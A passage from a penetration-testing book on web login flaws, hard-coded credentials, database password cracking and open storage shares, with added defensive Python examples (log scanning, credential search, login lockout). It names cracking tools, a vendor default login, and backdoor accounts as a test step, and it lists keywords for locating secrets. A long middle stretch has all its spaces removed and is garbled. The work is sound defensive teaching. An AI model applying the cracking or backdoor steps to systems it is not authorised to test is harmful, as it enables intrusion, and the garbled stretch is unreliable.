Figure 15-6: Using Acunetix Web Vulnerability Scanner to find cross-site scripting in a web application.

Another web vulnerability scanner that's very good at uncovering XSS that many other scanners won't find is AppSpider (formerly NTOSpider) from Rapid7 (www.rapid7.com/products/appspider). In my experience, AppSpider works better than other scanners at performing authenticated scans against applications that use multi-factor authentication systems. AppSpider should definitely be on your radar. Never forget this: When it comes to web vulnerabilities, the more scanners the better! If anything, someone else might end up using one of the scanners you don't use!

Countermeasures against input attacks

Websites and applications must filter incoming data. It's as simple as that. The sites and applications must check and ensure that the data entered fits within the parameters of what the application is expecting. If the data doesn't match, the application should generate an error or return to the previous page. Under no circumstances should the application accept the junk data, process it, and reflect it back to the user.

Secure software coding practices can eliminate all these issues if they're made a critical part of the development process. Developers should know and implement these best practices:

Never present static values that the web browser and the user don't need to see. Instead, this data should be implemented within the web application on the server side and retrieved from a database only when needed.

Filter out <script> tags from input fields.

Disable detailed web server and database-related error messages if possible.

Sensitive information stored locally

Quite often as part of my security testing, I use a hex editor to see how an application is storing sensitive information, such as passwords, in memory. When I'm using Firefox and Internet Explorer, I can use a hex editor, such as WinHex (www.x-ways.net/winhex), to search the active memory in these programs and frequently find user ID and password combinations.

I've found that with Internet Explorer this information is kept in memory even after browsing to several other websites or logging out of the application. This memory usage feature poses a security risk on the local system if another user accesses the computer or if the system is infected with malware that can search system memory for sensitive information. The way browsers store sensitive information in memory is also bad news if an application error or system memory dump occurs and the user ends up sending the information to Microsoft (or another browser vendor) for QA purposes. It's also bad news if the information is written to a dump file on the local hard drive and sits there for someone to find.

Try searching for sensitive information stored in memory related to your web application(s) or on standalone programs that require authentication. You just might be surprised at the outcome. Outside of obfuscating or encoding the login credentials, there's unfortunately not a great fix because this "feature" is part of the web browser that developers can't really control.

A similar security issue occurs on the client side when HTTP GET requests rather than HTTP POST requests are used to process sensitive information. The following is an example of a vulnerable GET request:

https://www.your_web_app.com/access.php?username=kbeaver&password=WhAteVur!&login=SoOn

GET requests are often stored in the user's web browser history file, web server log files, and proxy log files. GET requests can be transmitted to third-party sites via the HTTP Referer field when the user browses to a third-party site. All of the above can lead to exposure of login credentials and unauthorized web application access. The lesson: Don't use HTTP GET requests for logins. Use HTTP POST requests instead. If anything, consider these vulnerabilities to be a good reason to encrypt the hard drives of your laptops and other computers that are not physically secure!
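Because the GET request above ends up in server and proxy logs, a log check can find any login that is still using GET, and a redaction pass can keep credentials out of the logs that are kept. This added example (not the book's code) scans constructed Apache-style access-log lines; the parameter names it looks for are the usual ones a credential travels under.

```python
# Added example (not from the book): find GET requests carrying credentials in
# access logs and redact them. SAMPLE_LOG is constructed, not a real log.
import re
from urllib.parse import parse_qs, urlsplit

SENSITIVE_PARAMS = ("password", "passwd", "pwd", "pass", "token", "ssn")

# client, ident, user, [timestamp], "METHOD target HTTP/x.y", status
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
REDACT_RE = re.compile(
    r'([?&](?:%s)=)[^&\s"]*' % "|".join(SENSITIVE_PARAMS), re.IGNORECASE)

SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2016:10:01:02 -0500] "GET /access.php?username=kbeaver&password=WhAteVur!&login=SoOn HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [12/Jan/2016:10:01:05 -0500] "POST /access.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Jan/2016:10:02:11 -0500] "GET /search.php?q=laptop HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def credentials_in_query(line):
    """Return a finding for a GET whose query string names a sensitive parameter,
    otherwise None. POST bodies are not in the log, so POST lines never match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, target, _status = m.groups()
    if method != "GET":
        return None
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    hits = sorted(set(params) & set(SENSITIVE_PARAMS))
    if not hits:
        return None
    return {"client": client, "path": parts.path, "params": hits}


def scan_log(text):
    """Findings for every line of a log, in file order."""
    return [f for f in (credentials_in_query(l) for l in text.splitlines()) if f]


def redact_line(line):
    """Replace the value of any sensitive query parameter before the line is stored."""
    return REDACT_RE.sub(r"\1[REDACTED]", line)
```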

Default script attacks

Poorly written web programs, such as Hypertext Preprocessor (PHP) and Active Server Pages (ASP) scripts, can allow hackers to view and manipulate files on a web server and do other things they're not authorized to do. These flaws are also common in content management systems (CMSs) that are used by developers, IT staff, and marketing professionals to maintain a website's content. Default script attacks are common because so much poorly written code is freely accessible on websites. Hackers can also take advantage of various sample scripts that install on web servers, especially older versions of Microsoft's IIS web server.

Many web developers and webmasters use these scripts without understanding how they really work or without testing them, which can introduce serious security vulnerabilities.

To test for script vulnerabilities, you can peruse scripts manually or use a text search tool (such as the search function built into the Windows Start menu or the Find program in Linux) to find any hard-coded usernames, passwords, and other sensitive information. Search for admin, root, user, ID, login, signon, password, pass, pwd, and so on. Sensitive information embedded in scripts like this is rarely necessary and is often the result of poor coding practices that give precedence to convenience over security.
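The keyword search above, written as a small scanner that reports only quoted literals assigned to credential-looking variable names, so that a password read from the environment is not flagged while a hard-coded one is. This is an added example, not the book's code; the PHP and ASP sources it scans are constructed.

```python
# Added example (not from the book): scan script sources for quoted literals
# assigned to credential-looking variables. SAMPLE_FILES are constructed.
import re

# Keyword list from the text above, matched against variable-name tokens.
CREDENTIAL_WORDS = ("admin", "root", "user", "id", "login", "signon",
                    "password", "pass", "pwd")

# identifier = "literal"   (a leading PHP '$' is optional; ASP/VBScript has none)
ASSIGN_RE = re.compile(
    r"""\$?\b(?P<name>[A-Za-z_][A-Za-z0-9_]*)\s*=\s*(?P<q>["'])(?P<value>[^"']{1,200})(?P=q)""")

SAMPLE_FILES = {
    "db_connect.php": (
        '<?php\n'
        '$db_user = "root";\n'
        '$db_password = "Sup3rS3cret!";\n'
        '$conn = mysqli_connect("localhost", $db_user, $db_password);\n'),
    "login.asp": (
        '<%\n'
        'Dim adminPwd\n'
        'adminPwd = "letmein"\n'
        'If Request.Form("pwd") = adminPwd Then Session("ok") = True\n'
        '%>\n'),
    "config.php": (
        '<?php\n'
        '$db_password = getenv("DB_PASSWORD");\n'   # read at runtime, not hard-coded
        '$title = "Welcome";\n'),
}


def _name_tokens(name):
    """Split db_password / adminPwd / UserID into lowercase tokens."""
    spaced = re.sub(r"([a-z0-9])([A-Z])", r"\1_\2", name)
    return [t for t in spaced.lower().split("_") if t]


def looks_like_credential(name):
    """True if any token of the variable name matches a credential keyword.
    Tokens are compared whole or by prefix/suffix (userid, adminpwd), not by
    bare substring, to keep words like 'hidden' or 'width' from matching 'id'."""
    return any(t == w or t.startswith(w) or t.endswith(w)
               for t in _name_tokens(name) for w in CREDENTIAL_WORDS)


def find_hardcoded_credentials(files):
    """Return (file, line number, variable name) for each quoted literal assigned
    to a credential-looking variable. A getenv()/config call is not a literal and
    is therefore not reported."""
    findings = []
    for fname, source in files.items():
        for lineno, line in enumerate(source.splitlines(), 1):
            for m in ASSIGN_RE.finditer(line):
                if looks_like_credential(m.group("name")):
                    findings.append((fname, lineno, m.group("name")))
    return findings
```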

Countermeasures against default script attacks

You can help prevent attacks against default web scripts as follows:

Know how scripts work before deploying them within a web environment.

Make sure that all default or sample scripts are removed from the web server before it goes into use.

Keep any content management system software updated, especially WordPress as it tends to be a big target for attackers.

Don't use publicly accessible scripts that contain hard-coded confidential information. They're a security incident in the making.

Set file permissions on sensitive areas of your site/application to prevent public access.

Unsecured login mechanisms

Many websites require users to log in before they can do anything with the application. These login mechanisms often don't handle incorrect user IDs or passwords gracefully. They often divulge too much information that an attacker can use to gather valid user IDs and passwords.

To test for unsecured login mechanisms, browse to your application and log in

Using an invalid user ID with a valid password

Using a valid user ID with an invalid password

Using an invalid user ID and invalid password

After you enter this information, the web application will probably respond with a message similar to Your user ID is invalid or Your password is invalid. The web application might return a generic error message, such as Your user ID and password combination is invalid and, at the same time, return different error codes in the URL for invalid user IDs and invalid passwords, as shown in Figures 15-7 and 15-8.

Figure 15-7: URL returns an error when an invalid user ID is entered.

Figure 15-8: The URL returns a different error when an invalid password is entered.

In either case, this is bad news because the application is telling you not only which parameter is invalid, but also which one is valid. This means that malicious attackers now know a good username or password — their workload has been cut in half! If they know the username (which usually is easier to guess), they can simply write a script to automate the password-cracking process, and vice versa.

You should also take your login testing to the next level by using a web login cracking tool, such as Brutus (www.hoobie.net/brutus/index.html), as shown in Figure 15-9. Brutus is a very simple tool that can be used to crack both HTTP and form-based authentication mechanisms by using both dictionary and brute-force attacks.

Figure 15-9: The Brutus tool for testing for weak web logins.

As with any type of password testing, this can be a long and arduous task, and you stand the risk of locking out user accounts. Proceed with caution.

An alternative — and better maintained — tool for cracking web passwords is THC-Hydra (www.thc.org/thc-hydra).

Most commercial web vulnerability scanners have decent dictionary-based web password crackers but none (that I'm aware of) can do true brute-force testing like Brutus can. As I discuss in Chapter 8, your password-cracking success is highly dependent on your dictionary lists. Here are some popular sites that house dictionary files and other miscellaneous word lists:

ftp://ftp.cerias.purdue.edu/pub/dict

http://packetstormsecurity.org/Crackers/wordlists

www.outpost9.com/files/WordLists.html

Acunetix Web Vulnerability Scanner does a good job testing for weak passwords during its scans. I've successfully used this scanner to uncover weak web passwords that I wouldn't have found otherwise. Such a finding often leads to further penetration of the system.

You might not need a password-cracking tool at all because many front-end web systems, such as storage management systems and IP video and physical access control systems, simply have the passwords that came on them. These default passwords are usually "password," "admin," or nothing at all. Some passwords are even embedded right in the login page's source code, such as the network camera source code shown in lines 207 and 208 in Figure 15-10.

Figure 15-10: A network camera's login credentials embedded directly in its HTML source code.

Countermeasures against unsecured login systems

You can implement the following countermeasures to prevent people from attacking weak login systems in your web applications:

Any login errors that are returned to the end user should be as generic as possible, saying something similar to Your user ID and password combination is invalid.

The application should never return error codes in the URL that differentiate between an invalid user ID and an invalid password.

If a URL message must be returned, the application should keep it as generic as possible. Here's an example:

www.your_web_app.com/login.cgi?success=false

This URL message might not be convenient to the user, but it helps hide the mechanism and the behind-the-scenes actions from the attacker.

Use CAPTCHA (also reCAPTCHA) or web login forms to help prevent password-cracking attempts.

Employ an intruder lockout mechanism on your web server or within your web applications to lock user accounts after 10–15 failed login attempts. This chore can be handled via session tracking or via a third-party web application firewall add-on like I discuss in the later section "Putting up firewalls."

Check for and change any vendor default passwords to something that's easy to remember yet difficult to crack.
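The login countermeasures above in one handler: the same generic message and the same success=false URL whether the user ID or the password was wrong, the same hashing work for an unknown user so the two cases cannot be told apart by timing either, and a server-side lockout at the tenth failure. This is an added example, not the book's code; the user store, its password and the PBKDF2 parameters are constructed, and an out-of-band unlock() stands in for whatever reset process a real application would use.

```python
# Added example (not from the book): generic login errors plus server-side
# lockout. USERS is a constructed in-memory store; names are hypothetical.
import hashlib
import hmac
import os

MAX_FAILURES = 10  # the low end of the 10-15 range recommended above
GENERIC_ERROR = "Your user ID and password combination is invalid."
ITERATIONS = 50_000  # constructed demo value; tune for your platform


def hash_password(password, salt=None):
    """PBKDF2-HMAC-SHA256 of the password under a 16-byte random salt."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


# Constructed user store: user ID -> salt, hash, failure counter, lock flag.
_salt, _hash = hash_password("correct horse battery staple")
USERS = {"kbeaver": {"salt": _salt, "hash": _hash, "failures": 0, "locked": False}}

# A dummy record so that an unknown user ID costs the same hashing work as a
# real one; otherwise response time alone would say whether the ID exists.
_DUMMY_SALT, _DUMMY_HASH = hash_password("dummy")


def login(user_id, password):
    """Return (ok, message). The message never says which half was wrong, and a
    locked account is reported with the same message as a bad password."""
    record = USERS.get(user_id)
    salt = record["salt"] if record else _DUMMY_SALT
    expected = record["hash"] if record else _DUMMY_HASH
    _, attempt = hash_password(password, salt)
    matches = hmac.compare_digest(attempt, expected)  # constant-time compare
    if record is None or record["locked"]:
        return False, GENERIC_ERROR
    if matches:
        record["failures"] = 0
        return True, "Welcome"
    record["failures"] += 1
    if record["failures"] >= MAX_FAILURES:
        record["locked"] = True
    return False, GENERIC_ERROR


def unlock(user_id):
    """Out-of-band reset (help desk, e-mail flow, timeout); not reachable from the form."""
    record = USERS[user_id]
    record["failures"] = 0
    record["locked"] = False


def redirect_url(ok):
    """The only two URLs the browser ever sees after a login attempt."""
    return "/home" if ok else "/login.cgi?success=false"
```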

HackingWeb2.0Newerwebtechnologies,originallydubbed“Web2.0,”havechangedhowtheInternetisused.FromYouTubetoFacebooktoTwitter,newserverandclient-sidetechnologies,suchaswebservices,Ajax,andFlash,arebeingrolledoutasifthey’regoingoutofstyle.Andthesearen’tjustconsumertechnologies.Businessesseethevalueinthem,anddevelopersareexcitedtoutilizethelatestandgreatesttechnologiesintheirenvironments.

Unfortunately,thedownsidetothesetechnologiesiscomplexity.ThesenewrichInternetapplications,asthey’realsoreferredto,aresocomplexthatdevelopers,qualityassuranceanalysts,andsecuritymanagersarestrugglingtokeepupwithalltheirassociatedsecurityissues.Don’tgetmewrong;thevulnerabilitiesinnewerapplicationsareverysimilartowhatshowupwithlegacytechnologies,suchasXSS,SQLinjection,parametermanipulation,andsoon.Youhavetoremainvigilant.

Inthemeantime,herearesomevaluabletoolsyoucanusetotestforflawsinyourWeb2.0applications:

WebDeveloper(http://chrispederick.com/work/web-developer)foranalyzingscriptcodeandperformingothermanualchecks.

WSDigger(www.mcafee.com/us/downloads/free-tools/wsdigger.aspx)foranalyzingwebservices.

WSFuzzer(www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project)foranalyzingwebservices.

TechnologiessuchasAjaxandwebservicesareheretostay,sotrytogetyourarmsaroundtheirsecurityissuesnowbeforethetechnologygrowsevenmorecomplex.

PerforminggeneralsecurityscansforwebapplicationvulnerabilitiesIwanttoreiteratethatbothautomatedandmanualtestingneedtobeperformedagainstyourwebsystems.You’renotgoingtoseethewholepicturebyrelyingonjustoneofthesemethods.Ihighlyrecommendusinganall-in-onewebapplicationvulnerabilityscannersuchasAcunetixWebVulnerabilityScannerorAppSpidertohelpyourootoutwebvulnerabilitiesthatwouldbeunreasonableifnotimpossibletofindotherwise.CombinethescannerresultswithamaliciousmindsetandthehackingtechniquesIdescribeinthischapter,andyou’reonyourwaytofindingthewebsecurityflawsthatmatter.

MinimizingWebSecurityRisksKeepingyourwebapplicationssecurerequiresongoingvigilanceinyourethicalhackingeffortsandonthepartofyourwebdevelopersandvendors.Keepupwiththelatesthacks,testingtools,andtechniquesandletyourdevelopersandvendorsknowthatsecurityneedstobeatoppriorityforyourorganization.Idiscussgettingsecuritybuy-ininChapter20.

Youcangaindirecthands-onexperiencetestingandhackingwebapplicationsbyusingthefollowingresources:

OWASPWebGoatProject(www.owasp.org/index.php/Category:OWASP_WebGoat_Project)Foundstone’sSASSHacmeTools(www.mcafee.com/us/downloads/free-tools/index.aspx)

Ihighlyrecommendedyoucheckthemoutandgetyourhandsdirty!

PracticingsecuritybyobscurityThefollowingformsofsecuritybyobscurity—hidingsomethingfromobviousviewusingtrivialmethods—canhelppreventautomatedattacksfromwormsorscriptsthatarehard-codedtoattackspecificscripttypesordefaultHTTPports:

Toprotectwebapplicationsandrelateddatabases,usedifferentmachinestoruneachwebserver,application,anddatabaseserver.

TheoperatingsystemsontheseindividualmachinesshouldbetestedforsecurityvulnerabilitiesandhardenedbasedonbestpracticesandthecountermeasuresdescribedinChapters12and13.

Usebuilt-inwebserversecurityfeaturestohandleaccesscontrolsandprocessisolation,suchastheapplication-isolationfeatureinIIS.Thispracticehelpsensurethatifonewebapplicationisattacked,itwon’tnecessarilyputanyotherapplicationsrunningonthesameserveratrisk.Useatoolforobscuringyourwebserver’sidentity—essentiallyanonymizingyourserver.AnexampleisPort80Software’sServerMask(www.port80software.com/products/servermask).Ifyou’rerunningaLinuxwebserver,useaprogramsuchasIPPersonality(http://ippersonality.sourceforge.net)tochangetheOSfingerprintsothesystemlookslikeit’srunningsomethingelse.

Changeyourwebapplicationtorunonanonstandardport.ChangefromthedefaultHTTPport80orHTTPSport443toahighportnumber,suchas8877,and,ifpossible,settheservertorunasanunprivilegeduser—thatis,somethingotherthansystem,administrator,root,andsoon.

Nevereverrelyonobscurityalone;itisn’tfoolproof.Adedicatedattackermightdeterminethatthesystemisn’twhatitclaimstobe.Still,evenwiththenaysayers,itcanbebetterthannothing.

PuttingupfirewallsConsiderusingadditionalcontrolstoprotectyourwebsystems,includingthefollowing:

Anetwork-basedfirewallorIPSthatcandetectandblockattacksagainstwebapplications.ThisincludescommercialfirewallsfromsuchcompaniesasWatchGuard(www.watchguard.com)andPaloAltoNetworks(www.paloaltonetworks.com)Ahost-basedwebapplicationIPS,suchasSecureIIS(www.eeye.com/products/secureiis-web-server-security)orServerDefender(www.port80software.com/products/serverdefender)oraWebApplicationFirewall(WAF)fromvendorssuchasBarracudaNetworks(www.barracuda.com/products/webapplicationfirewall)andFortiNet(www.fortinet.com/products/fortiweb/index.html)

Theseprogramscandetectwebapplicationandcertaindatabaseattacksinrealtimeandcutthemoffbeforetheyhaveachancetodoanyharm.

AnalyzingsourcecodeSoftwaredevelopmentiswheremanysoftwaresecurityholesbeginandshouldendbutrarelydo.Ifyoufeelconfidentinyoursecuritytestingeffortstothispoint,youcandigdeepertofindsecurityflawsinyoursourcecode—thingsthatmightneverbediscoveredbytraditionalscannersandhackingtechniquesbutthatareproblemsnonetheless.Fearnot!It’sactuallymuchsimplerthanitsounds.No,youwon’thavetogothroughthecodelinebylinetoseewhat’shappening.Youdon’tevenneeddevelopmentexperience(althoughitdoeshelp).

Todothis,youcanuseastaticsourcecodeanalysistool,suchasthoseofferedbyKlocwork(www.klocwork.com)andCheckmarx(www.checkmarx.com).Checkmarx’sCxSuiteisastandalonetoolthat’sreasonablypricedandverycomprehensiveinitstestingofbothwebapplicationsandmobileapps—somethingthat’shardtofindamongsourcecodeanalysisvendors.

AsshowninFigure15-11,withCxSuite,yousimplyloadtheEnterpriseClient,login

totheapplication(defaultcredentialsareadmin@cx/admin),runtheCreateScanWizardtopointittothesourcecodeandselectyourscanpolicy,clickNext,clickRun,andyou’reoffandrunning.

Figure15-11:UsingCxSuitetodoananalysisofanopensourceAndroidmobileapp.

Whenthescancompletes,youcanreviewthefindingsandrecommendedsolutions,asshowninFigure15-12.

Figure15-12:ReviewingtheresultsofanopensourceAndroide-mailapp.

Asyoucansee,whatwasseeminglyasafeandsecuree-mailappdoesn’tappeartobeallthat.Youneverknowuntilyoucheckthesourcecode!

CxDeveloperisprettymuchallyouneedtoanalyzeandreportonvulnerabilitiesinyourC#,Java,andmobilesourcecodebundledintoonesimplepackage.Checkmarx,likeafewothers,alsooffersacloud-basedsourcecodeanalysisservice.Ifyoucangetoveranyhurdlesassociatedwithuploadingyoursourcecodetoathirdpartyinthecloud,thesecanofferamoreefficientandmostlyhands-freeoptionforsourcecodeanalysis.

Sourcecodeanalysiswilloftenuncoverdifferentflawsthantraditionalwebandmobilesecuritytesting.Ifyouwantthemostcomprehensiveleveloftesting,doboth.Theextralevelofchecksofferedbysourceanalysisisbecomingmoreandmoreimportantwithmobileapps.Theseappsareoftenfullofsecurityholesthatmanynewersoftwaredevelopersdidn’tlearnaboutinschool.IcoveradditionalmobileflawsinChapter11.

Thebottomlinewithwebapplicationandmobileappsecurityisthatifyoucanshowyourdevelopersandqualityassuranceanalyststhatsecuritybeginswiththem,youcanreallymakeadifferenceinyourorganization’soverallinformationsecurity.

UncoveringMobileAppFlawsInadditiontorunningatoolsuchasCxSuitetocheckformobileappvulnerabilities,thereareseveralotherthingsyou’llwanttolookforincluding:

Cryptographicdatabasekeysthatarehard-codedintotheappImproperhandlingofsensitiveinformationsuchasstoringpersonally-identifiableinformation(a.k.a.PII)locallywheretheuserandotherappscanaccessitLoginweaknesses,suchasbeingabletogetaroundloginpromptsAllowingweak,orblank,passwords

Notethatthesechecksaremostlyuncoveredviamanualanalysisandmayrequiretoolssuchaswirelessnetworkanalyzers,forensicstools,andwebproxiesthatItalkaboutinChapter9andChapter11,respectively.AswithIoT,theimportantthingisthatyou’retestingthesecurityofyourmobileapps.Betterforyoutofindtheflawsthanforsomeoneelse!

Chapter 16

Databases and Storage Systems

In This Chapter

Testing and exploiting database flaws

Finding storage weaknesses

Ferreting out sensitive information

Countering database and storage abuse

Attacks against databases and storage systems can be very serious because that's where "the goods" are located, and those with ill intent are well aware of that. These attacks can occur across the Internet or on the internal network when external attackers and malicious insiders exploit any number of vulnerabilities. These attacks can also occur via the web application through SQL injection.

Diving Into Databases

Database systems, such as Microsoft SQL Server, MySQL, and Oracle, have lurked behind the scenes, but their value and their vulnerabilities have finally come to the forefront. Yes, even the mighty Oracle that was once claimed to be unhackable is susceptible to exploits similar to its competition. With the slew of regulatory requirements governing database security, hardly any business can hide from the risks that lie within because practically every business (large and small) uses some sort of database either in-house or hosted in the cloud.

Choosing tools

As with wireless networks, operating systems, and so on, you need good tools if you're going to find the database security issues that count. The following are my favorite tools for testing database security:

Advanced SQL Password Recovery (www.elcomsoft.com/asqlpr.html) for cracking Microsoft SQL Server passwords

Cain & Abel (www.oxid.it/cain.html) for cracking database password hashes

Nexpose (www.rapid7.com/products/nexpose) for performing in-depth vulnerability scans

SQLPing3 (www.sqlsecurity.com/downloads) for locating Microsoft SQL Servers on the network, checking for blank passwords for the 'sa' account (the default SQL Server system administrator), and performing dictionary password-cracking attacks

You can also use exploit tools, such as Metasploit, for your database testing.

Finding databases on the network

The first step in discovering database vulnerabilities is to figure out where they're located on your network. It sounds funny, but many network admins I've met aren't even aware of various databases running in their environments. This is especially true for the free SQL Server Express database software editions that anyone can download and run on your network.

I can't tell you how often I find sensitive production data, such as credit card and Social Security numbers, being used in test databases that are completely wide open to abuse by curious insiders or even external attackers that have made their way into the network. Using sensitive production data in the uncontrolled areas of the network such as sales, software development, and quality assurance (QA) is a data breach waiting to happen.

The best tool I've found to discover Microsoft SQL Server systems is SQLPing3, which is shown in Figure 16-1.

Figure 16-1: SQLPing3 can find SQL Server systems and check for missing sa account passwords.

SQLPing3 can even discover instances of SQL Server hidden behind personal firewalls, such as Windows Firewall. This is a nice feature, as Windows Firewall is enabled by default on Windows 7 and up.

If you have Oracle in your environment, Pete Finnigan has a great list of Oracle-centric security tools at www.petefinnigan.com/tools.htm that can perform functions similar to SQLPing3.

Cracking database passwords

SQLPing3 also serves as a nice dictionary-based SQL Server password-cracking program. As you saw in Figure 16-1, it checks for blank sa passwords by default. Another free tool for cracking SQL Server, MySQL, and Oracle password hashes is Cain & Abel, shown in Figure 16-2.

Figure 16-2: Using Cain & Abel to crack Oracle password hashes.

You simply load Cain & Abel, click the Cracker tab at the top, select Oracle Hashes at the bottom left, and click the blue plus symbol at the top to load a username and password hash to start the cracking. You can also select Oracle TNS Hashes at the bottom left and attempt to capture Transport Network Substrate hashes off the wire when capturing packets with Cain. You can do the same for MySQL password hashes.

The commercial product ElcomSoft Distributed Password Recovery (www.elcomsoft.com/edpr.html) can also crack Oracle password hashes. If you have access to SQL Server master.mdf files (which are often readily available on the network due to weak share and file permissions, as I outline later in this chapter), you can use ElcomSoft's Advanced SQL Password Recovery (www.elcomsoft.com/asqlpr.html) to recover database passwords immediately.

You might stumble across some legacy Microsoft Access database files that are password protected as well. No worries: The tool Advanced Office Password Recovery (www.elcomsoft.com/acpr.html) can get you right in.

As you can imagine, these password-cracking tools are a great way to demonstrate the most basic of weaknesses in your database security. It's also a nice way to underscore the problems with critical files scattered across the network in an unprotected fashion.

Another good way to demonstrate SQL Server weaknesses is to use Microsoft SQL Server 2008 Management Studio Express (www.microsoft.com/en-us/download/details.aspx?id=7593) to connect to the database systems you now have the passwords for and set up backdoor accounts or browse around to see (and show) what's available. In practically every unprotected SQL Server system I come across, there's sensitive personal financial or healthcare information available for the taking.

Scanning databases for vulnerabilities

As with operating systems and web applications, some database-specific vulnerabilities can be rooted out only by using the right tools. I use Nexpose to find such issues as:

Buffer overflows

Privilege escalations

Password hashes accessible through default/unprotected accounts

Weak authentication methods enabled

A great all-in-one commercial database vulnerability scanner for performing in-depth database checks—including user rights audits on SQL Server, Oracle, and so on—is AppDetectivePRO (www.trustwave.com/Products/Database-Security/AppDetectivePRO). AppDetectivePRO can be a good addition to your security testing tool arsenal if you can justify the investment.

Many vulnerabilities can be tested from both an unauthenticated outsider's perspective as well as a trusted insider's perspective. The important thing is to review the security of your databases from as many angles as reasonably possible. As I've said before, if it's out there and accessible, people are going to play with it.

Following Best Practices for Minimizing Database Security Risks

Keeping your databases secure is actually pretty simple if you do the following:

Run your databases on dedicated servers (or workstations, where necessary).

Check the underlying operating systems for security vulnerabilities. I cover operating system exploits for Windows and Linux in Chapters 12 and 13, respectively.

Ensure that your databases fall within the scope of patching and system hardening.

Require strong passwords on every database system. Most enterprise-ready databases such as Oracle and SQL Server allow you to use domain authentication (such as Active Directory or LDAP) so you can just tie in your existing domain policy and user accounts and not have to worry about managing a separate set.

Use appropriate file and share permissions to keep prying eyes away.

De-identify any sensitive production data before it's used in non-production environments such as development or QA.

Check your web applications for SQL injection and related input validation vulnerabilities. (I cover web application security in Chapter 15.)

Use a network firewall, such as those available from Fortinet (www.fortinet.com) or Cisco (www.cisco.com), and database-specific controls, such as those available from Imperva (www.imperva.com) and Idera (www.idera.com).

Perform related database hardening and management using a tool such as Microsoft Security Compliance Manager (http://technet.microsoft.com/en-us/library/cc677002.aspx).

Run the latest version of database server software. The new security features in SQL Server 2012 and SQL Server 2016 are great advancements toward better database security.

Opening Up About Storage Systems

Attackers are carrying out a growing number of storage-related hacks and use various attack vectors and tools to break into the storage environment. (Surely you know what I'm going to say next.) Therefore, you need to get to know the techniques and tools yourself and use them to test your own storage environment.

There are a lot of misconceptions and myths related to the security of such storage systems as Fibre Channel and iSCSI Storage Area Networks (SANs), CIFS and NFS-based Network Attached Storage (NAS) systems, and so on. Many network and storage administrators believe that "Encryption or RAID equals storage security," "An external attacker can't reach our storage environment," "Our systems are resilient," or "Security is handled elsewhere." These are all very dangerous beliefs, and I'm confident that more attacks will target critical storage systems.

As with databases, practically every business has some sort of network storage housing sensitive information that it can't afford to lose. That's why it's important to include both network storage (SAN and NAS systems) and traditional file shares in the scope of your security testing.

Choosing tools

These are my favorite tools for testing storage security:

nmap (http://nmap.org) for port scanning to find live storage hosts

SoftPerfect Network Scanner (www.softperfect.com/products/networkscanner) for finding open and unprotected shares

FileLocator Pro (www.mythicsoft.com)

Nexpose for performing in-depth vulnerability scans

Finding storage systems on the network

To seek out storage-related vulnerabilities, you have to first figure out what's where. The best way to get rolling is to use a port scanner and, ideally, an all-in-one vulnerability scanner, such as Nexpose or LanGuard. Also, given that many storage servers have web servers built in, you can use such tools as Acunetix Web Vulnerability Scanner and Netsparker to uncover web-based flaws. You can use these vulnerability scanners to gain good insight into areas that need further inspection, such as weak authentication, unpatched operating systems, cross-site scripting, and so on.

A commonly overlooked storage vulnerability is that many storage systems can be accessed from both the de-militarized zone (DMZ) segment and the internal network segment(s). This vulnerability poses risks to both sides of the network. Be sure to manually check to see if you can reach the DMZ from the internal network and vice versa.

You can also perform basic file permission and share scans (as outlined in Chapter 12) in conjunction with a text search tool to uncover sensitive information that everyone on the network should not have access to. Digging down further, a quick means for finding open network shares is to use SoftPerfect Network Scanner's share scanning capabilities, as shown in Figure 16-3.

Figure 16-3: Using SoftPerfect Network Scanner to search for network shares.

As you can see in Figure 16-3, Network Scanner enables you to perform a security scan and a security-permission scan for all devices or simply folders. I recommend selecting Specific account in the Authentication section shown in Figure 16-3 and then clicking Manage so you can enter a domain account for the network that has general user permissions. This will provide a good level of access to determine which shares are accessible.

Once Network Scanner has completed its scan, the shares showing Everyone in the Shared Folder Security column point you to the shares that need attention. Hardly a security assessment goes by without coming across such shares open to the Windows Everyone group. Just as common is to see the directories and files within these shares that are also accessible to any logged-in Windows user to open, modify, delete—whatever they please. How's that for accountability!?

Rooting out sensitive text in network files

Once you find open network shares, you'll then want to scan for sensitive information stored in files such as PDFs, .docx, and .xlsx files. It's as simple as using a text search utility, such as FileLocator Pro or Effective File Search (www.sowsoft.com/search.htm). Alternatively, you can use Windows Explorer or the find command in Linux to scan for sensitive information, but it's just too slow and cumbersome for my liking.

You'll be amazed at what you come across stored insecurely on users' desktops, server shares, and more, such as:

Employee health records

Customer credit card numbers

Corporate financial reports

Source code

Master database files (as I mentioned earlier)

The sky's the limit. Such sensitive information should not only be protected by good business practices, but is also governed by state, federal, and international regulations, so you have to make sure that you find it and secure it.

Do your searches for sensitive text while you're logged in to the local system or domain as a regular user—not as an administrator. This will give you a better view of regular users who have unauthorized access to sensitive files and shares that you thought were otherwise secure. When using a basic text search tool, such as FileLocator Pro, look for the following text strings:

DOB (for dates of birth)

SSN (for Social Security numbers)

License (for driver's license information)

Credit or CCV (for credit card numbers)

Don't forget about your mobile devices when seeking sensitive, unprotected information. Everything from laptops to USB drives to external hard drives is fair game to the bad guys. A misplaced or stolen system is all it takes to create a costly data breach.

The possibilities for information exposure are endless; just start with the basics and only peek into common files that you know might have some juicy info in them. Limiting your search to these files will save you a ton of time!

.txt

.doc and .docx

.rtf

.xls and .xlsx

.pdf
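The keyword sweep just described, as an added Python example that is not from the book or from any of the tools it names: it walks a directory tree (a mounted share, say), looks only at the file types listed above, searches only for the keyword strings listed above, and reports each hit with a short context snippet. The sample share it builds is constructed for the demo; .docx/.xlsx are opened as zip archives and their XML parts tag-stripped, while .pdf/.doc/.xls are read as raw bytes, which misses compressed PDF content (a limitation of this example, not of FileLocator Pro).

```python
import os
import re
import tempfile
import zipfile

# File types the chapter says to peek into first.
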